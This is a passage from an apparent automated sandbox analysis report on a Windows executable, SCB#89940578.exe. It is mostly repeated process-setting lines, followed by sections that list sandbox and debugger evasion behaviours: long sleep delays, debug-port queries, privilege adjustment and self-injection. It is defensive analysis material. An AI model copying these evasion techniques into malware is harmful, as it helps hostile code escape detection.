Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOGPFAULTERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: Yara match File source: Process Memory Space: SCB#89940578.exe PID: 7112, type: MEMORYSTR
Source: C:\Users\user\Desktop\SCB#89940578.exe Memory allocated: 1030000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Memory allocated: 2B10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Memory allocated: 1030000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Memory allocated: 7C00000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Memory allocated: 71B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Memory allocated: 8C00000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Memory allocated: 9C00000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Memory allocated: A030000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Memory allocated: B030000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Memory allocated: C030000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe TID: 3744 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe TID: 7276 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 2_2_00403D74
Source: C:\Users\user\Desktop\SCB#89940578.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Thread delayed: delay time: 60000 Jump to behavior
Source: SCB#89940578.exe, 00000002.00000002.2812221693.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\SCB#89940578.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 2_2_0040317B mov eax, dword ptr fs:[00000030h] 2_2_0040317B
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap, 2_2_00402B7C
Source: C:\Users\user\Desktop\SCB#89940578.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\SCB#89940578.exe Memory written: C:\Users\user\Desktop\SCB#89940578.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process created: C:\Users\user\Desktop\SCB#89940578.exe "C:\Users\user\Desktop\SCB#89940578.exe" Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Users\user\Desktop\SCB#89940578.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
